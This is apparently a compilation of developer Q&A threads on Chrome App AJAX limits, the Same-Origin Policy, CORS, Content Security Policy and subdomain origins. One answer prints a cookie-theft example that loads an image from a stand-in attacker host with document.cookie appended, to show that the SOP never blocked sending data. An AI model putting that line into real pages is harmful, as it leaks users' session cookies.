I am planning a Chrome App project where I will be performing numerous AJAX calls. Before settling on Chrome Apps as the platform of choice, I would like to have a better understanding of its limitations and advantages regarding AJAX calls compared to web apps. Having conducted some research, I came up with the answers below. Since I have limited experience in this area, I would like to know if my findings are correct and if there are other limitations that should be considered.
1. Origin
Limitations regarding origins are more flexible for Chrome Apps than for web apps: The same-origin policy related to AJAX requests can be relaxed in the app’s manifest by requesting cross-origin permissions. Therefore, there is no need for techniques like Cross-Origin Resource Sharing (CORS) and JSONP (which is in fact prohibited by the Content Security Policy (CSP)).
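To illustrate, a minimal manifest sketch requesting cross-origin permissions could look like this (the host patterns are placeholders, not from any real project):
{
  "name": "My App",
  "version": "1.0",
  "manifest_version": 2,
  "app": {
    "background": { "scripts": ["background.js"] }
  },
  "permissions": [
    "https://api.example.com/*",
    "http://*.example.org/*"
  ]
}
With these permissions granted, plain XMLHttpRequest calls to the listed hosts go through without CORS or JSONP.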
2. Content
Limitations regarding accessible content are more severe: Chrome Apps can only refer to scripts, stylesheets, images, frames, plugins and fonts within the app, but media resources (video, audio, and associated text tracks) can be loaded from any external resource. The ‘connect-src’ directive is set to allow loading any URI, so given cross-origin permissions or using CORS, one can make AJAX calls to all hosts and receive text and media type responses. Other content types can be served as blobs. The CSP cannot be relaxed.
(A peculiarity I found: As stated, CSP forbids loading several content types, therefore one has to load them as blobs via AJAX requests. As a result of the same-origin policy, this would have to be done via CORS. Most servers don’t have CORS enabled, even if their content is public. Therefore, if Chrome Apps enforced ‘Access-Control-Allow-Origin’ (ACAO) response headers at all times, the CORS approach would fail in a lot of cases.
The solution to this problem is cross-origin permissions: if permission was given to access a server, the request is let through even if no appropriate ACAO header is received. But one can also rely on CORS alone: if no cross-origin permission is granted but the request is made to a server with wildcard ACAO settings, it is let through as well.)
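To illustrate the blob approach for otherwise CSP-forbidden content types, a minimal sketch (the URL is a placeholder, and it assumes a cross-origin permission or wildcard ACAO) could be:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://example.com/image.png', true); // placeholder cross-origin URL
xhr.responseType = 'blob';
xhr.onload = function () {
  var img = document.createElement('img');
  // blob: object URLs count as local content, so the CSP accepts them as an image source
  img.src = window.URL.createObjectURL(xhr.response);
  document.body.appendChild(img);
};
xhr.send();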
Two additional things to note:
Some documentation of Chrome Apps refers to extensions instead of apps. In these cases I assume that the information provided there is correct for apps too.
Synchronous XHR requests are disabled.
Unfortunately, you'll just have to test this all out. I've found the Google docs (especially for Chrome Apps) to be very lacking and frequently wrong. Going through them, it appears they were written for extensions, copied over wholesale for apps, and then only changed where a difference happened to be noticed - so not everything is covered.
As for accessing external sources, follow these "instructions":
http://developer.chrome.com/apps/app_external.html#external
And if you find an issue, report it BOTH here and at https://code.google.com/p/chromium/issues/list
Related
Modern browsers prevent scripts from fetching RSS feeds from sites outside the domain of the running script.
The RSS feed gets transmitted but the browser's Same Origin Policy won't let you access it.
Only feeds from servers that specify the CORS Access-Control-Allow-Origin header can be read.
Why?
We are not talking about malicious scripts - just XML data.
What is the thinking behind considering an RSS feed as a potential danger?
How could it be exploited?
Only feeds from servers that specify the CORS Access-Control-Allow-Origin header can be read.
So all major web browsers implement a blanket block just so that insecure servers don't leak otherwise publicly available feeds? That still does not make much sense to me.
By default, the Same-Origin Policy won't let a client read the response to a cross-origin request, regardless of whether the requested resource is publicly accessible. CORS is a protocol for the server to instruct a browser to selectively relax some of the Same-Origin Policy's restrictions (both in terms of reading and sending) on network access to a resource from some requesting client.
There's nothing special about an RSS feed. In the case you describe, it's just one cross-origin resource among others. Carving out an exception for RSS feeds in the SOP would have needlessly complicated it.
The RSS can still be downloaded using a download manager or even wget. That does not make any sense.
True, but the SOP was never meant as a substitute for server-side access control; for one thing, it's only enforced in browsers, not in other user agents like curl or Postman. Rather, the SOP is meant to protect Web origins from one another.
why is RSS data considered dangerous?
We are not talking about malicious scripts - just XML data. What is the thinking behind considering an RSS feed as a potential danger? How could it be exploited?
You've got it backwards. The SOP's restrictions on network access are not meant to defend the client against a malicious resource. Instead, they're meant to defend the resource against a malicious cross-origin client, which might for example attempt to exfiltrate data from the resource.
If you control the resource in question, you can override the default behaviour of browsers and configure CORS to allow clients from any Web origin to read the response from the requested resource.
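For example, a server hosting a public feed could opt in by sending the relevant response header; a hypothetical response might start with:
HTTP/1.1 200 OK
Content-Type: application/rss+xml
Access-Control-Allow-Origin: *
With that header present, browsers let cross-origin scripts read the feed's contents.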
AJAX preceded CORS by several years: the first XMLHttpRequest W3C Working Draft dates to 2006, while CORS only became a W3C Recommendation in 2014. I know, I was programming way back then!
Support for cross-origin requests in AJAX only came after 2006, prompting the need to devise the CORS protocol. See XMLHttpRequest Level 2, W3C Working Draft 25 February 2008:
XMLHttpRequest Level 2 enhances XMLHttpRequest with new features, such as cross-site requests [...]
(my emphasis)
Note that "cross-site" should be understood as "cross-origin", here. The difference matters now that "site" has a more technical meaning.
Besides, CORS support was added to major browsers in the later 2000s. It didn't wait until the 2014 W3C standard.
First, a big thanks to all the commenters and to @jub0bs for his considered and detailed answer. You all gave me a lot of food for thought.
However, it has since dawned on me that XML data such as RSS can embed text containing <script> tags or event-handler attributes, and that markup, once fetched, might be inadvertently inserted verbatim into the page (using innerHTML or similar DOM methods) - which would be equivalent to any other cross-site scripting (XSS) exploit.
So RSS should be considered dangerous.
The remedy, according to OWASP, is not to use innerHTML when incorporating fetched data.
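A minimal sketch of the difference, with a made-up feed snippet and element id:
var untrusted = "<script>alert('xss')<\/script>Latest headline"; // text fetched from a feed
var target = document.getElementById("headline"); // hypothetical target element
target.innerHTML = untrusted;   // unsafe: the string is parsed as HTML, so attacker markup becomes live DOM
target.textContent = untrusted; // safer: the string is treated as plain text and tags are merely displayed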
So I deployed all of my React apps that use an API. I am having problems sending requests to this API: something blocks them, and so my apps aren't working.
Note: all of my requests are CORS requests, so there is no problem with them.
GitHub blocks my request
and this is a link to the project shown in the picture: news-blog
The problem is that you're trying to fetch non-secure (http) content from a secure (https) site, which violates the site's Content-Security-Policy (CSP) and is blocked as mixed content. This is insecure behavior as far as modern browsers are concerned.
From MDN:
The HTTP Content-Security-Policy response header allows web site administrators to control resources the user agent is allowed to load for a given page. With a few exceptions, policies mostly involve specifying server origins and script endpoints. This helps guard against cross-site scripting attacks (XSS).
The right way of solving this would be to load the data from a secure source. For example, instead of fetching from http://newsapi.org/v2/everything, try https://newsapi.org/v2/everything (note the difference between http and https).
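In a fetch call, the fix is only the scheme; a sketch with a placeholder query and API key:
fetch("https://newsapi.org/v2/everything?q=react&apiKey=YOUR_KEY") // https, not http
  .then(function (res) { return res.json(); })
  .then(function (data) { console.log(data); });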
I spent some time trying to understand how Cross-Origin Resource Sharing (CORS) works, and I cannot believe how it could be designed so insecurely.
When a website hosted on foo.com wants to request a resource stored at bar.com via AJAX, the browser asks bar.com whether the request is allowed.
Only if bar.com explicitly allows cross-origin requests from foo.com (via the Access-Control-Allow-Origin response header) is the resource delivered to the client.
It's not a security problem if data is read. But if data can be sent to the requested server, it is.
In the past, if a hacker successfully inserted JavaScript code into a website to steal cookie data or other information, the Same-Origin Policy prevented him from sending that information directly to his own server.
But thanks to CORS, a hacker can send the stolen information directly to his own server just by allowing any origin on it.
I know CORS is still under development, but it is already supported by almost all major browsers. So why is CORS designed like this? Wouldn't it be much more secure if the originating server were asked for permission to send AJAX requests?
In my opinion, this is a degradation of security. Or is it not?
All "known issues" I found related to CORS are about weak configuration on the requested server.
The same-origin policy is designed purely to prevent one origin from reading resources from another origin. The side effect you describe -- preventing one origin from sending data to another origin -- has never been part of the same-origin policy's purpose.
In fact, sending data to another origin has never been prohibited, ever, from the very beginnings of the Web. Your browser sends cross-origin requests all the time: any time it encounters a cross-origin <img>, <script>, <iframe>, etc. The same-origin policy simply restricts scripts' ability to read these resources; it has never restricted the browser's ability to fetch them and show them to the user.
Consider the following code:
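// evil.example.com stands in for an attacker-controlled server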
var img = document.createElement("img");
img.src = "http://evil.example.com/steal?cookie=" + document.cookie;
This creates:
<img src="http://evil.example.com/steal?cookie=SESSION=dfgh6r...">
which will send cookie data to evil.example.com when it is added to the page's DOM. The same-origin policy has never, ever prevented this kind of behavior.
If you are interested in whitelisting origins that your page is allowed to send data to, you want a content security policy, which was designed explicitly as an XSS mitigation mechanism.
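For instance, a policy along these lines (hosts are placeholders) whitelists where the page may connect or load images from, which would block the <img>-based exfiltration shown above:
Content-Security-Policy: default-src 'self'; img-src 'self'; connect-src 'self' https://api.example.com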
CORS wasn't designed for this security problem.
For the problem you mention, you need to prevent the site from executing arbitrary JavaScript. More specifically, you want to prevent:
scripts loaded from a non-whitelisted origin
scripts embedded directly in the page (as an attribute or in a <script> element)
For that, we use the Content-Security-Policy header, which can for example be set to "script-src 'self'" (meaning that only scripts loaded from an external file on the same origin can be executed).
Any website with non-trivial generated content should have this header set, but unfortunately it might be hard to introduce in old frameworks, as it adds very strong restrictions.
See http://en.wikipedia.org/wiki/Content_Security_Policy
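As a sketch of how the header might be set, assuming a Node/Express backend (an assumption here; any server stack can send the same header):
var express = require("express");
var app = express();
app.use(function (req, res, next) {
  // only same-origin external script files may execute; inline scripts are blocked
  res.set("Content-Security-Policy", "script-src 'self'");
  next();
});
app.listen(3000);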
I'm intending to add security for our JavaScript code which gets embedded on other sites - e.g. analytics code.
The user copies 4-5 lines of the code and puts it on his site. The code actually downloads the real script as the next step.
I have been recommended to use CORS instead of the current JSONP calls as I can restrict the domains.
As I understand it, CORS would only work if the HTML page which adds my script declares the allowed domains; if I declare the allowed domains when serving the JS file, it wouldn't work.
Is the CORS configuration for the final JS, or for the HTML page intending to use my script?
Edit:
Since it's confusing to the users, I have made it simpler.
An HTML page on domain A adds my script from domain B, like Google Analytics. Can I add the access-control headers while serving my JS, or should the HTML page add them in its response?
There is a good explanation from Wikipedia for this question:
CORS can be used as a modern alternative to the JSONP pattern. While JSONP supports only the GET request method, CORS also supports other types of HTTP requests. Using CORS enables a web programmer to use regular XMLHttpRequest, which supports better error handling than JSONP. On the other hand, JSONP works on legacy browsers which predate CORS support. CORS is supported by most modern web browsers. Also, while JSONP can cause cross-site scripting (XSS) issues where the external site is compromised, CORS allows websites to manually parse responses to ensure security.
As I understand, the CORS would work only if the html page which will add my scripts needs to add access domains
You can allow all domains via:
Access-Control-Allow-Origin: *
Also, CORS now has good browser support.
P.S. IE8-9 have their own implementation via XDomainRequest.
CORS works by having your server output the Access-Control-Allow-Origin header containing the allowed domains. The sites that make AJAX requests to your server don't need to do anything special to enable CORS; there is no configuration required on their side. They simply make normal XHR requests and the browser internally handles the CORS.
You control the CORS access from the header on your server. In CORS, you can also control the HTTP verbs that are allowed, for example POST or GET (Access-Control-Allow-Methods) or the permitted request headers (Access-Control-Allow-Headers).
Note that IE8 doesn't support the CORS XHR; Microsoft decided to create their own CORS implementation with XDomainRequest. So if any of the sites that call your server want to support IE8, they will need to use XDomainRequest instead of XMLHttpRequest. There is no support for CORS in IE7 or earlier - not even XDomainRequest.
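A feature-detection sketch for callers who need IE8/9 alongside CORS-capable browsers (the endpoint is a placeholder):
var url = "https://api.example.com/data"; // hypothetical CORS-enabled endpoint
if (window.XDomainRequest) {
  // IE8/9: Microsoft's own CORS mechanism
  var xdr = new XDomainRequest();
  xdr.open("GET", url);
  xdr.onload = function () { console.log(xdr.responseText); };
  xdr.send();
} else {
  // standards-based CORS via XMLHttpRequest
  var xhr = new XMLHttpRequest();
  xhr.open("GET", url, true);
  xhr.onload = function () { console.log(xhr.responseText); };
  xhr.send();
}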
I have a site where I'm developing my REST endpoints on:
https://prefixone.somesite.com
And I have another site where I'm developing my UI Framework:
https://prefixtwo.somesite.com
I can successfully log in and get a 200 response in IE. In FF and Chrome, I get a "405 METHOD NOT ALLOWED". Chrome sheds more light on the situation by saying "XMLHttpRequest cannot load XXXXXXXXXXX. Origin xxxxxxxxxxx is not allowed by Access-Control-Allow-Origin."
Both of the sites are on somesite.com
Does this situation still qualify as XSS?
Your question is "why would I still receive a 405 even though both url's are form XXXX.com?", but in fact, your URLs are NOT from the same domain.
xxx.yyyy.com and zzz.yyyy.com are not the same domain. They may share a significant part of their names, but they are not the same.
This is because it is perfectly possible for subdomains within a domain to be operated by entirely independent people. Consider uk.com. The owner of this domain sells the third-level domains within it as a competitor to the standard British country-level domain co.uk.
The sites at xxx.uk.com and zzz.uk.com are completely different sites, and you would not expect the former to be able to load content from the latter without violating the same origin policy rules.
The browser has no knowledge of which domains would do this and which wouldn't, so it plays it safe and assumes that any two subdomains could be operated by different people.
Even yyyy.com and www.yyyy.com are not considered the same thing.
I hope that answers your question.
As for what to do about it....
1) Put everything on the same subdomain. The most common reason for splitting a site across multiple subdomains is performance, but unless you're operating Google or Facebook, it's unlikely to be critical to your performance, and there are probably other things you could do first that would be more helpful. Also, the new SPDY protocol (soon to evolve into HTTP v2) will render the technique obsolete.
2) If you must split it across multiple subdomains, you might want to look into using a crossdomain.xml file, which you can place on each server to give them explicit permission to access each other's content (note that crossdomain.xml is honoured by plugin runtimes such as Flash and Silverlight rather than by XMLHttpRequest, for which CORS headers are the equivalent).
Basically, you need to run the following JavaScript on both pages:
document.domain = "somesite.com";
This tells the browser that, for the purposes of the Same-Origin Policy, the part that should matter is somesite.com, not the prefixed part.
Look up "document domain" on Google for more.
The same-origin policy restricts this, and as the name implies it works with origins, not domains. An origin is the combination of scheme (protocol), host, and port. So even two pages running on the same host cannot communicate if they are on different ports or protocols; likewise, https://prefixone.somesite.com and https://prefixtwo.somesite.com are different origins because their hosts differ.
If you plan to support only newer browsers, look at adding the CORS Access-Control-* response headers.
If you need to support older browsers look at something like easyXDM.